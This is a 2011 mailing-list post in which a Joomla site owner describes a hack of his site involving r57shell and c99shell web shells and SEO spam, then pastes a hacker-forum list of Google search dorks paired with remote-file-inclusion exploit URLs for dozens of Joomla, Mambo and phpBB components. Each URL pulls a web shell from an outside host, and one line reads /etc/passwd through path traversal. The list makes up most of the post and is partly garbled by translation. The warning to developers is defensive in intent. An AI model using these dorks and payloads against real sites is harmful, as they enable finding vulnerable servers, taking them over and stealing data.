An interesting r57shell - c99shell exploit

644 views
Skip to first unread message

Rudy Preston

unread,
Feb 2, 2011, 1:24:58 PM2/2/11
to joomla-...@googlegroups.com, joomla-de...@googlegroups.com, joomla-dev...@googlegroups.com
Hi All

Had a joomla site on a shared server get hacked and a folder ended up in the public root called "mnt"
if you didn't know joomla, it would easily sit there in plain view.

Inside was a full package of tools for an r57shell and c99 shell setup:

http://www.scribd.com/doc/20337568/r57shell
http://www.scribd.com/doc/20337569/c99shell

With a neat little package of things that were then put into the code for the website using a module they created (not part of the install originally) called "com_ccboard"
It was found in the "modules" folder. It also has code in the configuration.php file and the index.php file of your template in the footer.

the config file code was used to redirect googlebots to pages on an external website but be indexed at the real site (ended up being 25,100 linked pages).

The template index code added a footer full of all the links they had indexed (position -1000, -1000 in the css)

The r57shell and c99shell contains a spam mailer setup that also allows them to create a database table, load a flat file of info into the table, create an object from the tabular data then delete the table. The flat file was filled with links back to a download site the fake index used.

This sent me on a google search to find out a few things. One of the first thing I found out is that google is a hacker's best friend.
But they also cache a page that needs a login for, so I was able to view hacker forum posts without having a login by viewing a search link
in google via the "cached" link on google search results.

Here is an example of what I found (if your component is on this list, hope u study the r57 and c99 scripts to see how they can take over a server from your component):

And, sad to say, this is just one of hundreds of lists like this. Please note that I did see that joomla 1.5.16 caused a lot of back doors to close, it made a big ripple in the forums.

STAY UP TO DATE

Google search:
inurl: "com_flyspray"

exploits:
/ Components / com_flyspray / startdown.php? File =../../../../../ etc / passwd% 00

exploits:
/ Index.php? _REQUEST = & _REQUEST [Option] = com_content & _REQUEST [Itemid] = 1
& GLOBALS = & mosConfig_absolute_path = http://site/sh3L/r57.jpg?cmd=id
Google search:
inurl: index.php? option = com_simpleboard

exploits:
/ Components / com_simpleboard / file_upload.php? SBP = http:///sh3L/r57.jpg?
Google search:
inurl: "com_hashcash"

exploits:
/ Components / com_hashcash / server.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_htmlarea3_xtd-c"

exploits:
/ Components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_sitemap"

exploits:
/ Components / com_sitemap / sitemap.xml.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_performs"


exploits:
/ Components / com_forum / download.php? Phpbb_root_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_pccookbook"

exploits:
components / com_pccookbook / pccookbook.php? mosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: index.php? option = com_extcalendar

exploits:
/ Components / com_extcalendar / extcalendar.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "minibb"

exploits:
components / minibb / index.php? absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_smf"

exploits:
/ Components / com_smf / smf.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
exploits:
/ Modules / mod_calendar.php? Absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_pollxt"

exploits:
/ Components / com_pollxt / conf.pollxt.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_loudmounth"

exploits:
/ Components / com_loudmounth / includes / abbc / abbc.class.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_videodb"

exploits:
/ Components / com_videodb / core / videodb.class.xml.php? MosConfig_absolute_path = http: / / site/sh3L/r57.jpg?
Google search:
inurl: index.php? option = com_pcchess

exploits:
/ Components / com_pcchess / include.pcchess.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_multibanners"

exploits:
/ Administrator / components / com_multibanners / extadminmenus.class.php? MosConfig_absolute_path = ht tp: / / site/sh3L/r57.jpg?
Google search:
inurl: "com_a6mambohelpdesk"

exploits:
/ Administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php? MosConfig_live_site = http: / / site/sh3L/r57.jpg?
Google search:
inurl: "com_colophon"

exploits:
/ Administrator / components / com_colophon / admin.colophon.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_mgm"

exploits:
administrator / components / com_mgm / help.mgm.php? mosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_mambatstaff"

exploits:
/ Components / com_mambatstaff / mambatstaff.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_securityimages"

exploits:
/ Components / com_securityimages / configinsert.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
exploits:
/ Components / com_securityimages / lang.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_artlinks"

exploits:
/ Components / com_artlinks / artlinks.dispnew.php? MosConfig_absolute_path = http://site/sh3L/r57.jpg?
Google search:
inurl: "com_galleria"

exploits:
/ Components / com_galleria / galleria.html.php? MosConfig_absolute_path = http://site/lang/r57.jpg?

Google search:

inurl: index.php? option = com_simpleboard


/ Components / com_simpleboard / file_upload.php? SBP = http://hitbaytar.kayyo.com/c99shell.txt?

Google search:

inurl: "com_hashcash"

CODE:
/ Components / com_hashcash / server.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?


Google search:
inurl: "com_sitemap"
/ Components / com_sitemap / sitemap.xml.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?



Google search:
inurl: "com_forum"


/ Components / com_forum / download.php? Phpbb_root_path = http://hitbaytar.kayyo.com/c99shell.txt?

Google search:
inurl: index.php? option = com_extcalendar


/ Components / com_extcalendar / extcalendar.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?

Google search:
inurl: "minibb"


components / minibb / index.php? absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?

Google search:
inurl: "com_pollxt"


/ Components / com_pollxt / conf.pollxt.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?

Google search:
inurl: "com_loudmounth"


/ Components / com_loudmounth / includes / abbc / abbc.class.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?

Google search:
inurl: "com_videodb"


/ Components / com_videodb / core / videodb.class.xml.php? MosConfig_absolute_path = http: / / hitbaytar.kayyo.com/c99shell.txt?

Google search:
inurl: index.php? option = com_pcchess


/ Components / com_pcchess / include.pcchess.php? MosConfig_absolute_path = http://hitbaytar.kayyo.com/c99shell.txt?

Google search:
inurl: "com_multibanners"


/ Administrator / components / com_multibanners / extadminmenus.class.php? MosConfig_absolute_path = ht tp: / / hitbaytar.kayyo.com/c99shell.txt?

Google search:
inurl: "com_a6mambohelpdesk"


/ Administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php? MosConfig_live_site = http: / / hitbaytar.kayyo.com/c99shell.txt?



Google search: "activity.php? page = Hof" or "Powered by phpBB" inurl: activity.php arabilirsiniz shaped ...

usage: http://hedef/script/language/lang_en...t.com/c99.txt?



Powered phpMyAgenda


Code:

agenda.php3? rootagenda = Shell

agenda2.php3? rootagenda = Shell

inurl: agenda.php3


Excerpt:
agenda.php3? rootagenda = Shell


Calling code: Xero Portal v1.2




[Exploit:
www. [target]. com / [script_pat] / admin / admin_linkdb.php? phpbb_root_path = http://evilscripts?
www. [target]. com / [script_pat] / admin / admin_forum_prune.php? phpbb_root_path = http://evilscripts? # www. [target]. com / [script_pat] / admin / admin_extensions.php? phpbb_root_path = http:/ / evilscripts?
www. [target]. com / [script_pat] / admin / admin_board.php? phpbb_root_path = http://evilscripts?
www. [target]. com / [script_pat] / admin / admin_attachments.php? phpbb_root_path = http://evilscripts?
www. [target]. com / [script_pat] / admin / admin_users.php? phpbb_root_path = http://evilscripts?


inurl: "fclick.php? fid"


show.php? path = http://muhacir.up.md/c99.txt?



show.php? path = http://muhacir.up.md/r57shell.txt?


Reed <= 0.3.1 (box.inc.php) Remote File Include Vulnerability


http:// [target] / [path] / sipss ... s] = [SHELL]

For example:

/ Sipssys / code / box.inc.php? Config [sipssys] = http:// [target] / [path] / shell.x



**--Rudy--**
ethos7.com

Phone: 480.382.5288
pathf...@ethos7.com
ru...@ethos7.com

joomlabamboo.com | joomla.org | ijoomla.com | xcloner.com | Site5 | ethos7

wordpress.org | elegantThemes | themeForest | rocketThemes | studioPress

Simplicity is the ultimate sophistication
--
Leonardo da Vinci


Reply all
Reply to author
Forward
0 new messages